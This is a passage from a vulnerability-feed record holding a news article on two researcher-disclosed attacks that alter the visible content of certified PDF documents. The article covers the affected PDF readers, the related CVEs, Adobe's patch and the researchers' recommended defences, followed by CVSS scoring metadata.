called certification signatures.\n\nCertification signatures also allow different subsets of modifications on the PDF document based on the permission level set by the certifier, including the ability to write text to specific form fields, provide annotations, or even add multiple signatures.\n\nThe Evil Annotation Attack (EAA) works by modifying a certi\ufb01ed document that's provisioned to insert annotations to include an annotation containing malicious code, which is then sent to the victim. On the other hand, the idea behind the Sneaky Signature attack (SSA) is to manipulate the appearance by adding overlaying signature elements to a document that allows filling out form fields.\n\n[](<https://thehackernews.com/images/-XI939fibAlc/YLH6tRFXbXI/AAAAAAAACrs/F682v-ANSZg5_ZTzYhINC7JWsp_hXCPmQCLcBGAsYHQ/s0/pdf.jpg>)\n\n\"By inserting a signature field, the signer can define the exact position of the field, and additionally its appearance and content, the researchers said. \"This flexibility is necessary since each new signature could contain the signer's information. The information can be a graphic, a text, or a combination of both. Nevertheless, the attacker can misuse the flexibility to stealthily manipulate the document and insert new content.\"\n\nIn a hypothetical attack scenario detailed by the academics, a certifier creates a certified contract with sensitive information while enabling the option to add further signatures to the PDF contract. By taking advantage of these permissions, an attacker can modify the contents of the document, say, to display an International Bank Account Number (IBAN) under their control and fraudulently transfer funds, as the victim, unable to detect the manipulation, accepts the tampered contract.\n\n15 of 26 PDF applications evaluated by the researchers, counting Adobe Acrobat Reader ([CVE-2021-28545](<https://nvd.nist.gov/vuln/detail/CVE-2021-28545>) and [CVE-2021-28546](<https://nvd.nist.gov/vuln/detail/CVE-2021-28546>)), Foxit Reader ([CVE-2020-35931](<https://nvd.nist.gov/vuln/detail/CVE-2020-35931>)), and Nitro Pro, were found vulnerable to the EAA attack, enabling an attacker to change the visible content in the document. Soda PDF Desktop, PDF Architect, and six other applications were identified as susceptible to SSA attacks.\n\n[](<https://thehackernews.com/images/-649dfyPYuIQ/YLH6aK9xw1I/AAAAAAAACrk/Xzd9sALjIm4dVZ3QDGW-sCf5lx7jjCGoACLcBGAsYHQ/s0/pdf-security.jpg>)\n\nMore troublingly, the study revealed that it's possible to execute high-privileged JavaScript code \u2014 e.g., redirect the user to a malicious website \u2014 in Adobe Acrobat Pro and Reader by sneaking such code via EAA and SSA as an incremental update to the certified document. The weakness ([CVE-2020-24432](<https://nvd.nist.gov/vuln/detail/CVE-2020-24432>)) was addressed by Adobe as part of its Patch Tuesday update for [November 2020](<https://helpx.adobe.com/security/products/acrobat/apsb20-67.html>).\n\nTo fend off such attacks, the researchers recommend prohibiting FreeText, Stamp, and Redact annotations as well as ensuring that signature fields are set up at defined locations in the PDF document prior to certification, alongside penalizing any subsequent addition of signature fields with an invalid certification status. The researchers have also created a Python-based utility called [PDF-Detector](<https://pdf-demos.de/pdf-detector>), which parses certified documents to highlight any suspicious elements found in the PDF document.\n\n\"Although neither EAA nor SSA can change the content itself \u2013 it always remains in the PDF \u2013 annotations and signature fields can be used as an overlay to add new content,\" the researchers said. \"Victims opening the PDF are unable to distinguish these additions from regular content. And even worse: annotations can embed high privileged JavaScript code that is allowed to be added to certain certified documents.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2021-05-29T08:34:00", "type": "thn", "title": "Researchers Demonstrate 2 New Hacks to Modify Certified PDF Documents", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24432", "CVE-2020-35931", "CVE-2021-28545", "CVE-2021-28546"], "modified": "2021-05-29T08:34:47", "id": "THN:0EF55AC7BD7B39F693C88E87CC622019", "href": "https://thehackernews.com/2021/05/researchers-demonstrate-2-new-hacks-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}